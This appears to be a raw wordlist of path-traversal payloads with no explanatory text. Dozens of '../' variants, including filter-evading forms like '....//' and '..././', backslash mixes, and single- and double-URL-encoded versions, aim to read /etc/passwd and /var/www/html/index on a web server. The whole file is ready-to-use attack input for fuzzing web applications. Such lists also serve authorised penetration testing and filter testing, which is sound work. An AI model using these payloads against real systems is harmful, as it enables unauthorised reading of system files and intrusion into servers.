/etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../../../../../../../../etc/passwd
\../../../../../../../../../../../../../../../../../../../../../etc/passwd
....//........//....//....//....//....//....//....//....//....//....//....//....//....////....//....//etc/passwd
/....//..../....//....//....//....//....//....//....//....//....//....//....//....///....//....//etc/passwd
\....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....\/....\/........\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/\/....\/....\/etc/passwd
/....\/.......\....\....\....\....\....\....\....\....\....\....\....\....\....\....\....\.\/....\/....\/....\/etc/passwd
\....\/....\....\....\....\....\....\....\....\....\....\....\....\....\....\....\....\....\/....\/....\/....\/etc/passwd
..././....././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././././..././..././..././etc/passwd
/.././...././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././././..././..././..././etc/passwd
\.././..././..././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././..././..././etc/passwd
....//....////....////....////....////....////....////....////....////....////....////....////....////....////....////....////....////....////....////....////....////....////....//////....////....////....////....////etc/passwd
/...////....//.../////.../////.../////.../////.../////.../////.../////.../////.../////.../////.../////.../////.../////.../////.../////.../////.../////...///////....////....////....////etc/passwd
\...////...\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////\...////.////....////....////....////etc/passwd
../../../../.../../../.././../../../../../../var/www/html/index
\../.../../../../../../../../.././../../../../var/www/html/index
/../../../../../../../../../../../../../../../../../var/www/html/index
....//.......//....//....//....//....//....//....//....//....//....//....//.//....//....//var/www/html/index
\....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/www/html/index
/....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/www/html/index
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/var/www/html/index
\....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/var/www/html/index
/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/var/www/html/index
..././..././..././..././..././..././..././..././..././..././..././..././..././..././V..././..././..././..././var/www/html/index
/..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././var/www/html/index
\..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././var/www/html/index
....////....////....////....////....////....////....////....////....////....////....////....////....////....////var/www/html/index
/....////....////....////....////....////....////....////....////....////....////....////....////....////....////....////....////var/www/html/index
\....////....////....////....////....////....////....////....////....////....////....////....////....////....////....////....////....////....////....////var/www/html/index
%2f%65%74%63%2f%70%61%73%73%77%64
%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%5c%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%25%35%63%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%65%74%63%2f%70%61%73%73%77%64
%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%65%74%63%2f%70%61%73%73%77%64
%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%5c%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%65%74%63%2f%70%61%73%73%77%64
%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%65%74%63%2f%70%61%73%73%77%64
%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%65%74%63%2f%70%61%73%73%77%64
%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%5c%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%65%74%63%2f%70%61%73%73%77%64
%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%2e%2e%2e%2f%2e%2f%2e%2e%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%65%74%63%2f%70%61%73%73%77%64
%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%2f%2e%2e%2f%2e%2f%2e%2e%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%65%74%63%2f%70%61%73%73%77%64
%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%5c%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%65%74%63%2f%70%61%73%73%77%64
%25%35%63%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64
